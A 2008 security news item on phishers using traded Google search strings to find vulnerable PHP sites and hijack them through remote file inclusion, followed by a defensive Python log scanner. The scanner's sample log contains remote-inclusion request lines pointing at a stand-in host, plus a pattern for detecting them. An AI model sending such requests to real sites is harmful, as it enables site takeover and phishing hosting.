Phishers Exploit Google Search to Trace Vulnerable Sites
A researcher working with MarkMonitor has found that three quarters (75%) of dubious phishing sites make surreptitious use of Google search terms that are shared and traded across underground forums, as reported by Hackinthebox on March 27, 2008.
John LaCour, CISSP and Director of Anti-Phishing for MarkMonitor, explained that phishers use Google search terms, known as "Google dorks," to locate Websites that are vulnerable and easy to hack. It is primarily Hypertext Preprocessor (PHP) based Websites that they use to launch their phishing attacks, as reported by Darkreading on March 26, 2008.
The search terms, or dorks, are frequently traded among hackers in their underground forums. This is how they obtain the "magic strings" that locate vulnerable sites on which to install their phishing exploits.
LaCour said that a phisher enters one of these Google dork strings into a search engine, and the search results show a long list of possibly vulnerable sites. The phisher then chooses one site and manipulates its PHP program by directing it towards the phisher's own PHP file for remote inclusion. Hackers find the search terms by trawling through genuine cyber-security forums and other sites that publish exploit information, for example Milw0rm.
Some phishers use "search bots" that they have programmed in advance to do the Googling work of locating vulnerabilities. Other hackers develop search bots that wait for commands while sitting in the Request for Comments (RFC) channel. Hackers log in and leave a message that acts like a 'bot'. It sends queries to Yahoo, AOL, and Google Search. They use Internet Relay Chat (IRC) and bots jointly to aggregate the results.
The use of Google dorks indicates that the average phisher isn't sufficiently motivated to implement sophisticated techniques. Instead, phishers choose established methods that provide an easier route to launching their exploits.
The MarkMonitor researcher revealed that there is a huge number of vulnerable PHP-based Websites for phishers to exploit. Researchers advise computer users to update and upgrade their security software frequently in order to keep phishers and hackers at bay.
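For site operators, the remote-inclusion step LaCour describes shows up in web server logs as a request to a PHP script in which a query parameter holds an absolute URL on another host. The following is an added example, not part of the original article or MarkMonitor's research: a small access-log check in Python, where the log lines, host names, and the `find_rfi_attempts` function are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in combined log format; all hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Mar/2008:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Mar/2008:10:01:09 +0000] "GET /index.php?page=http://files.example.net/kit.txt HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
198.51.100.4 - - [27/Mar/2008:10:02:11 +0000] "GET /view.php?inc=hTTp%3A%2F%2Ffiles.example.net%2Fkit.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.8 - - [27/Mar/2008:10:03:30 +0000] "GET /go.php?url=http://www.example.org/news HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client address, request target and status code of one log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# a parameter value that is itself an absolute URL
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_rfi_attempts(log_text, own_hosts=("www.example.org",)):
    """Return one record per PHP request whose parameter points at a foreign URL.

    own_hosts (assumed value here) lists the site's own host names, so that
    ordinary links back to the site itself are not reported.
    """
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(".php"):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decoded once; this catches double encoding
            if not REMOTE_SCHEME_RE.match(value):
                continue
            host = (urlsplit(value.strip()).hostname or "").lower()
            if host in own_hosts:
                continue
            hits.append({"client": client, "script": parts.path, "param": name,
                         "remote_host": host, "status": int(status),
                         # a 200 means the script answered: review these first
                         "answered": status == "200"})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit only shows that the request was made; whether the script actually included the remote file depends on the PHP code and configuration, so answered requests are the ones to inspect on the server.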
» SPAMfighter News - 01-04-2008